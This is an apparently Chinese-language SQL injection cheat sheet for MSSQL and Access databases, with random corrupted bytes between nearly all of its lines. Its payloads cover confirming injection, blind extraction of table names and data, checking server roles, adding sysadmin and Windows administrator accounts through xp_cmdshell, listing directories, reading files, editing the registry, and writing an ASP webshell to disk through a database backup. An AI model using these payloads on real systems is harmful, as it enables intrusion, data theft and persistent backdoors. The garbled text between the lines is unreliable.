1.判断是否有注入;and 1=1 ;and 1=2 �H
*[_cqnv
2.初步判断是否是mssql ;and user>0 0BIy��>wy:
;.TR�W�n�#
3.注入参数是字符'and [查询条件] and ''=' Q��$H���G
&;D8]7d�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �*^f<�W6xc
�l�Td� #bN
5.判断数据库系统 x�7~r,x(xM
rW�+ =��,L
;and (select count(*) from sysobjects)>0 mssql �7g%E`3)"
Z�?%zgqTXb
;and (select count(*) from msysobjects)>0 access &K.?p��2$X
(vb
SM}P��
}o�L'�8-y�
q�OSM}ei>s
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Q��V�{}�K�
w��*�o�eK�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 4<%��*�E{`
nq6@�6G�RG
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 QlJ)F{R8il
yp$_/p O=2
9.(1)猜字段的ascii值(access) x��n5l0'2�
�pgO�QIz�u
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 KO]T<R�
h<
eu��(:�`uu
(2)猜字段的ascii值(mssql) nHm}zO�L�c
MFb�9H{�LA
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��O�U8Lldt
�Wzw7tLY._
10.测试权限结构(mssql) �,QcF�|�~n
=K�6($|'=
�Xz�Il`�eH
�*.!Np9l,V
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �F�x�m$9(Y
����VxV�E
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �� #`o��2Z
#)C[5?{SNq
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |�|;hci��O
<�$X�3Hye�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,6om\9.E�@
����3wC' r
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- :.$3v�a�Z@
O�*0l+mop�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- YhD�tUt}?�
�G�&4&-�<�
;and 1=(select IS_MEMBER('db_owner'));-- ��sO�U�1n�
� !�"\80LP
P/�Q�!�<I
�K�#�pNe�c
11.添加mssql和系统的帐户 \=6l9Lrj>h
|�NpP2|4h�
;exec master.dbo.sp_addlogin username;-- Zg'Q�>��.:
;exec master.dbo.sp_password null,username,password;-- yt.F\��[1
y~F,�0"N\r
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- i�e2WL\tR4
_i�20|v���
;exec master.dbo.xp_cmdshell 'net user username password �Y*H|?uNF�
0a}u;gt,4w
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- jpO�7'iv�G
hR��K/T7v
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �MP!d���4
w-Da�~[J�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- a=��hxJ1O
~])�t �6i�
"
N�9 <w�U
8��0Gn%1A9
12.(1)遍历目录 g7O�q��X \
S�gp;@4`M�
;create table dirs(paths varchar(100), id int) px�}|Mu7z~
>_|O�1H./4
;insert dirs exec master.dbo.xp_dirtree 'c:\' ]�[?�G�/*k
�Ry%Mej:��
;and (select top 1 paths from dirs)>0 T�l2�C^�j�
@wE5S6! B\
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) (X?%^�^e!�
4c�l\^��yD
0@H|n^Md#�
��NhaI�<J
(2)遍历目录 N�iU�2@zgl
��]%?YZn<{
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �T>R0��T{A
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 1T�-8K��
r
Y�KO){��f5
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ;#oie<
Vit
�`Ye\p6v!+
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��<��8d^^0
y��0'R�mk,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �RP�E5K:P�
vK��_?<>��
a���� hR ^
%�l�,,_:7{
13.mssql中的存储过程 � B��[Zjfc
�4KH45|;�3
xp_regenumvalues 注册表根键, 子键 ~%�SH3$���
�C4�~;y�hz
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 }Rz3<e�ON�
�eC[$B9�9\
xp_regread 根键,子键,键值名 �kH�]yl�
2
Q���4f/�Z
;exec xp_regread Hhari!R�XC
�2�@%$;��.
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值
FE2�f�'e�
&�Ncz�v"TM
xp_regwrite 根键,子键, 值名, 值类型, 值 2\7`/,U6��
:k.Nb�N$i\
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 pO ml8SQ�f
%�2��X�HNW
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 z#]Jv!~EPE
`<\1[�HJ\�
xp_regdeletevalue 根键,子键,值名 X&�0 uI*r�
RV5n�,�J��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 uWM{J�EOl
8;�Yx�<woR
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ���b+f'�[;
G�cig*5� �
�Bb�g�nqzU
�1#0��{@35
14.mssql的backup创建webshell ZE�2$I^DY-
0I�fK�J*]M
use model jC7&s$>Q"g
IF�DZf��x
create table cmd(str image);
'+$Eh�FwD
*�T~Ve;3h;
insert into cmd(str) values (''); u�b;ZtsM,%
8"��fD`jtQ
backup database model to disk='c:\l.asp'; $ep�.-I��>
{|1Y:&M?��
.��8y3�O�]
�lsy��?A�c
15.mssql内置函数 GQ9\'z#��+
7D!u1?]d�{
;and (select @@version)>0 获得Windows的版本号 ��^s�VX)�%
76�Vl6cPu>
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Er+n�k`UR_
,ztI,1"k��
;and (select user_name())>0 爆当前系统的连接用户 ?ON-+u��
!-,�t'GF�(
;and (select db_name())>0 得到当前连接的数据库 Z|� V`B �`
E�pFQ|.mQ
WC|.�g�,9#
rxy�&sp��X
16.简洁的webshell U5���He?�
p�~9vP)74u
use model �2EfF�=Fm>
S6AU�[ASY.
create table cmd(str image); `~ �*� @q!
R0L�&*B�jm
insert into cmd(str) values (''); a��v$/Om�:
�S�L�;9Q�[
backup database model to disk='g:\wwwtest\l.asp';
